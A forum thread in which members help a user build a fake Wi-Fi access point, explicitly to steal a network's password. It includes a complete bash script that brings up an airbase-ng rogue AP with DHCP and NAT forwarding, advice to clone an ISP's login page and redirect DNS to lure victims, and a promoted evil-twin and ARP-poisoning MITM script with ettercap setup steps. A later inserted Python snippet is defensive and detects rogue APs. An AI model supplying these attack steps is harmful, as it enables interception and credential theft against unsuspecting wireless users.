How to Create a Fake Access Point or Are There Any Scripts?

Discussion in 'Scripts & Commands' started by HoT_Pursuit, 25 Jul 2012.

  1. HoT_Pursuit

    HoT_Pursuit Well-Known Member
    Hello guys

    I need a script to make a fake AP using Backtrack 5 & RTL8187.

    I found the "FakeAP_pwn" script by "g0t milk", but this script doesn't work with BT5 & it is only used to hack with Metasploit.

    I want a script to make a fake AP to steal the real AP password.
     
  2. Chaos

    Chaos Well-Known Member

    • Like Like x 2
  3. Pascal

    Pascal Wifi Sniffer
    Use Gerix on Backtrack ;)
     
    • Like Like x 1
  4. Chaos

    Chaos Well-Known Member

    The drawback to that technique is that well ... you can't know whether he'll connect to that "new" AP (if he has auto-connect) and he also has to enter the wpa on that fake login site of yours (which has to be the same as his provider)

    I've read some stuff about wifi pineapple, but not sure if it uses this same technique (I doubt it).
    I think it somehow sees that remembered password, which is something I'd wanna do (because that login page relies only on chance [ignorance of people])
     
    • Like Like x 1
  5. Pascal

    Pascal Wifi Sniffer

    After creating server, you have made a copy of the authentication page of the Internet access provider of the victim.

    Must be the same page and well done graphically in order to lure legitimate victim.

    Do not forget to redirect DNS to your desired server and leave the rest open to show the victim that he has access to the internet to navigate properly;)


    If the goal is to hack for a connection that is one thing but if it is to recover usernames and passwords or other bank, I will not answer to this kind of thread ...


    Remember that we do not like to undergo what is done in other;)
     
    • Like Like x 2
  6. Mr. Penguin

    Mr. Penguin Administrator
    Ah, so you want to make a form of honeypot. There are many devices out there you can purchase specifically for this reason.
    http://hakshop.myshopify.com/products/wifi-pineapple

    Code:
    #!/bin/bash
    echo "Killing Airbase-ng..."
    pkill airbase-ng
    sleep 2;
    echo "Killing DHCP..."
    pkill dhcpd3
    sleep 5;
    echo "Putting Wlan In Monitor Mode..."
    airmon-ng stop wlan1 # Change to your wlan interface
    sleep 5;
    airmon-ng start wlan1 # Change to your wlan interface
    sleep 5;
    echo "Starting Fake AP..."
    airbase-ng -e FreeWifi -c 11 -v wlan1 & # Change essid, channel and interface
    sleep 5;
    ifconfig at0 up
    ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
    sleep 5;
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE # Change eth3 to your internet facing interface
    echo > '/var/lib/dhcp3/dhcpd.leases'
    ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
    dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
    sleep 5;
    echo "1" > /proc/sys/net/ipv4/ip_forward
    Source & Credit: Exploit KB
     
    • Like Like x 1
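Added example, not part of the thread or of the posted script: from the defending side, an access point brought up under a network's name shows up in a wireless survey as a beacon that does not match the site's AP inventory. The sketch below compares survey results against an allowlist; the `Beacon` record, the inventory layout, the SSIDs and the MAC addresses are all constructed for illustration.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    security: str  # e.g. "OPEN", "WPA2"

# Constructed inventory of the site's authorized APs (hypothetical values).
AUTHORIZED = {
    "CorpNet": {
        "aa:bb:cc:00:00:01": {"channel": 1, "security": "WPA2"},
        "aa:bb:cc:00:00:02": {"channel": 6, "security": "WPA2"},
    },
}

# Constructed survey results, as a sensor or scan export might report them.
SAMPLE_SCAN = [
    Beacon("CorpNet", "aa:bb:cc:00:00:01", 1, "WPA2"),
    Beacon("CorpNet", "AA:BB:CC:00:00:02", 6, "WPA2"),
    Beacon("CorpNet", "00:11:22:33:44:55", 11, "OPEN"),
    Beacon("CorpNet", "aa:bb:cc:00:00:01", 11, "WPA2"),
    Beacon("CoffeeShop", "de:ad:be:ef:00:01", 3, "OPEN"),
]

def find_rogue_aps(scan, authorized):
    """Return [(bssid, [reasons])] for beacons that use one of our SSIDs
    but do not match the inventory."""
    findings = []
    for b in scan:
        known = authorized.get(b.ssid)
        if known is None:
            continue  # not our SSID; out of scope for this check
        bssid = b.bssid.lower()
        entry = known.get(bssid)
        reasons = []
        if entry is None:
            reasons.append("unknown-bssid")
            expected_security = {e["security"] for e in known.values()}
        else:
            expected_security = {entry["security"]}
            if b.channel != entry["channel"]:
                reasons.append("channel-mismatch")  # possible cloned BSSID
        if b.security not in expected_security:
            reasons.append("security-mismatch")
        if reasons:
            findings.append((bssid, reasons))
    return findings
```

The channel check matters because a copied BSSID alone passes a pure allowlist lookup; a known BSSID seen on a channel or with security settings the inventory does not list is worth investigating.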
  7. HoT_Pursuit

    HoT_Pursuit Well-Known Member
    Well

    Thanks, everybody :)

    I am still a beginner, & I want to learn everything in Linux OS.
     
  8. faizuldin

    faizuldin Well-Known Member

    Just want to ask you something: for what reason do you want to create a fake AP?
     
  9. Mr. Penguin

    Mr. Penguin Administrator
    Probably for a honeypot. Extracting information, passwords and alike :D
     
  10. comfast98

    comfast98 Well-Known Member

    Backtrack 5 r3 Fake-AP MITM script! 100% working v1.0

    HEY everyone,

    MAKE SURE YOUR SCRIPT IS VERSION 1.0. It will say on the main menu what version you have.

    HERE IS THE DOWNLOAD LINK!!!!
    https://www.onlinefilefolder.com/4sJoCIrYCK6KEl

    HERE IS A LINK TO THE ORIGINAL THREAD.
    http://top-hat-sec.com/forum/index.php?topic=1667.0

    HERE IS A LINK TO MY WEBSITE SHOWING THE SCRIPT IN ACTION
    http://em3rgency.com/em3rgencys-100-...p-mitm-script/

    AFTER about a few weeks of learning and non-stop coding, the script is finally complete!!!! Be easy on me, this is my first script I have ever written.

    The script is 100% working on bt5r3 test machine. You just install the prerequisites and chmod 775 911_AP.sh. You can run the script from any directory on your PC. You can even place it inside /usr/bin and just type 911_AP in terminal and it will be part of your system!!

    It should be fully functional. The script has everything you need on a fresh install of BT5r3 to make it compatible and ready to run.

    1. Prerequisites and Updates
    2. Run FAKE AP Static
    3. Run EVIL TWIN AP
    4. Run Standard ARP poison
    5. Netdiscover connected clients
    6. EXIT

    !!!!!ALSO CHANGE /etc/default/dhcp3-server!!!!!!!
    put "at0" and save

    It will not work with ISC_DHCP_SERVER. You will need to do the following.

    THIS IS FOR any other OS besides BT5
    apt-get purge dhcp3-server
    apt-get purge dhcp3-common

    You will need to use this version of DHCP3 server
    http://www.mediafire.com/?oxgkgdio8ndjq5l
    http://www.mediafire.com/?p3g4maize6p60dy

    tar xzvf <FILENAME>
    tar xzvf <FILENAME>

    Enjoy!!! you can seriously pwn anyone on a network with this script. IT is fast!!! and reliable, I have had my FAKE_AP running for days without a crash!!!


    THANKS,

    TO GET THE ARP POISONING TO WORK CORRECTLY YOU HAVE TO

    make sure you commented out your etter.conf file so you don't have the # sign in front of the lines that say

    Open terminal and type

    gedit /etc/etter.conf --------> When done editing these lines save the file

    #If you are using IP tables, Like below

    # if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    to this "Just remove the # signs from the front of each line"

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
    And also edit these lines to look like this

    [privs]
    ec_uid = 65534 # nobody is the default
    ec_gid = 65534 # nobody is the default

    Change the 65534 to 0's in each of the 2 lines..

    [privs]
    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default

    !!!!!ALSO CHANGE /etc/default/dhcp3-server!!!!!!!
    put "at0" and save

    AND ENJOY YOUR WIRELESS PWNING!!!
     
    • Like Like x 1
  11. Pascal

    Pascal Wifi Sniffer
    Hello ;)


    For the first link for download :
    This file has been shared through Online Storage
    We could not retrieve this file because the link is invalid.


    Copyright © 2005-2013. All rights reserved.

    Have you a new link ?
     
  12. meknb

    meknb Mod
    #12 meknb, 7 Sep 2013
    Last edited: 2 Aug 2014
  13. ghostkids

    ghostkids Well-Known Member

    This file has been shared through Online Storage
    We could not retrieve this file because the link is invalid.

    Copyright © 2005-2014. All rights reserved.
     
  14. rdcdt

    rdcdt Active Member

    All links are dead
     